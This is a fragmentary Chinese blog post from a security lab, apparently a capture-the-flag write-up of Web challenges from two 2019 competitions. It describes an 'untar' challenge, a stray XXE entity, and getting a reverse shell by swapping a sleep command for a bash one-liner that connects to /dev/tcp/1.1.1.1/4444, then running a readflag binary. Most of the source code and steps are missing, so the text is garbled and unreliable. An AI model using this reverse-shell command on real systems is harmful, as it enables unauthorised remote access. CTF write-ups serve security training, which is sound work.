您当前的位置: 首页 > 

合天网安实验室

暂无认证

  • 0浏览

    0关注

    748博文

    0收益

  • 0浏览

    0点赞

    0打赏

    0留言

私信
关注
热门博文

2019湖湘杯和redhat杯的部分Web题解

合天网安实验室 发布时间:2019-12-02 10:44:20 ,浏览量:0

前言

通过这两次比赛把自己学到的东西总结一下,不过由于名次掉的太快就没有进入决赛。

大家自己体验一波。 0x01 untar 题目给了源码:
sandbox/2aeae26864f775d4cad75f15a6c95d97


&xxe;1111111
sleep 100改成bash -c 'bash -i >/dev/tcp/1.1.1.1/4444 0>&1',然后在自己的服务器监听一下。就可以反弹shell了。 getshell后发现并不能读取flag文件由于对www-data有权限的设置,但是在根目录下有一个readflag的二进制文件,但是执行它会出现一个随机计算的式子,由于nc这样的shell不能交互,但是上面有php和perl的环境那么我们可以上传文件去执行建立交互。从从而获得flag。

运行的结果:

参考链接 https://lihuaiqiu.github.io/2019/07/13/BUUCTF-Writeup-%E4%B8%80/

别忘了投稿哦

大家有好的技术原创文章

欢迎投稿至邮箱:edu@heetian.com

合天会根据文章的时效、新颖、文笔、实用等多方面评判给予200元-800元不等的稿费哦

有才能的你快来投稿吧!

了解投稿详情点击——重金悬赏 | 合天原创投稿涨稿费啦!

关注
打赏
1665306545
查看更多评论
立即登录/注册

微信扫码登录

0.0380s